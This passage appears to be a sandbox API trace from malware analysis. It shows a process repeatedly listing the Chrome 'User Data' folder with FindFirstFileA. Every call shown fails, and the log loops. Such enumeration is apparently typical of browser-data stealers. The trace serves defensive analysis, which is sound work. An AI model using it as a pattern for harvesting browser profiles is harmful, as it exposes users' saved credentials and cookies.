param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.629] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.629] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.629] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.629] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.630] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.630] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.630] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.630] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.630] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.630] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.630] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.630] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.630] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.630] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.630] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.630] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.630] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.630] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.630] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.630] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.630] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.631] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.631] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.631] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.631] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.631] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.631] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.631] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.631] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.631] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.631] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.631] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.631] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.631] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.631] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.631] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.631] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.632] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.632] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.632] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.632] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.632] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.632] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.632] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.632] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.632] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.632] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.632] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.632] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.632] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.632] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.632] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.632] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.633] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.633] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.633] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.633] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.633] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.633] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.633] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0174.633] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, 